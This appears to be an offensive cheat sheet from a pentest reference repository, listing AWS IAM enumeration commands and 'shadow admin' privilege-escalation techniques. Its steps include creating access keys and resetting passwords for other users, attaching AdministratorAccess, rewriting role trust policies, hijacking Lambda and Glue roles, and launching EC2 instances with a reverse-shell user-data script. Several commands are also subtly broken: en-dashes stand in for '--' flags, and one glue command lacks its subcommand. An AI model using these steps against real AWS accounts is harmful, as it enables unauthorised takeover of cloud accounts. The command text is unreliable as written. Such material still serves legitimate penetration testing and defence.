aws-iam.md (6734B)
1 --- 2 title: "AWS - Identity & Access Management" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/aws/aws-iam.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/aws/aws-iam.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # AWS - Identity & Access Management 12 13 ## Listing IAM access Keys 14 15 ```ps1 16 aws iam list-access-keys 17 ``` 18 19 ## Listing IAM Users and Groups 20 21 ```ps1 22 aws iam list-users 23 aws iam list-groups 24 ``` 25 26 ## Get IAM Details 27 28 ```ps1 29 aws iam get-account-authorization-details > iam.json 30 ``` 31 32 ## Assume a Specific Role 33 34 ```ps1 35 aws sts assume-role --role-arn arn:aws:iam::${accountId}:role/${roleName} --role-session-name ${roleName} 36 ``` 37 38 ## Login with MFA 39 40 Retrieve the MFA device ARN: 41 42 ```ps1 43 aws iam list-mfa-devices 44 ``` 45 46 Then create the session token: 47 48 ```ps1 49 aws sts get-session-token --serial-number ${arnMFADevice} --token-code ${MFACode} 50 ``` 51 52 ## Shadow Admin 53 54 ### Admin equivalent permission 55 56 - AdministratorAccess 57 58 ```powershell 59 "Action": "*" 60 "Resource": "*" 61 ``` 62 63 - **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance 64 65 ```powershell 66 aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789 67 ``` 68 69 - **iam:CreateAccessKey** : create a new access key to another IAM admin account 70 71 ```powershell 72 aws iam create-access-key –user-name target_user 73 ``` 74 75 - **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it 76 77 ```powershell 78 aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required 79 ``` 80 81 - **iam:UpdateLoginProfile** : reset other IAM users’ login passwords. 82 83 ```powershell 84 aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required 85 ``` 86 87 - **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses 88 89 ```powershell 90 aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess 91 aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess 92 aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess 93 ``` 94 95 - **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities. 96 97 ```powershell 98 aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json 99 ``` 100 101 - **iam:CreatePolicy** : add a stealthy admin policy 102 - **iam:AddUserToGroup** : add into the admin group of the organization. 103 104 ```powershell 105 aws iam add-user-to-group –group-name target_group –user-name my_username 106 ``` 107 108 - **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account. 109 110 ```powershell 111 aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json 112 ``` 113 114 - **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one. 115 116 ```powershell 117 aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default 118 aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 119 ``` 120 121 - **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function. 122 123 ```powershell 124 aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip 125 ``` 126 127 - **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint. 128 129 ```powershell 130 aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub 131 ``` 132 133 - **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses. 134 135 - **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. 136 137 ```powershell 138 # add ssh key 139 $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456 140 # execute a reverse shell 141 $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh 142 ``` 143 144 - **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account. 145 146 ```powershell 147 aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py 148 aws lambda invoke –function-name my_function output.txt 149 ``` 150 151 Example of code.py 152 153 ```python 154 import boto3 155 def lambda_handler(event, context): 156 client = boto3.client('iam') 157 response = client.attach_user_policy( 158 UserName='my_username', 159 PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" 160 ) 161 return response 162 ``` 163 164 - **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account. 165 166 ```powershell 167 aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub 168 ``` 169 170 ## References 171 172 - [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)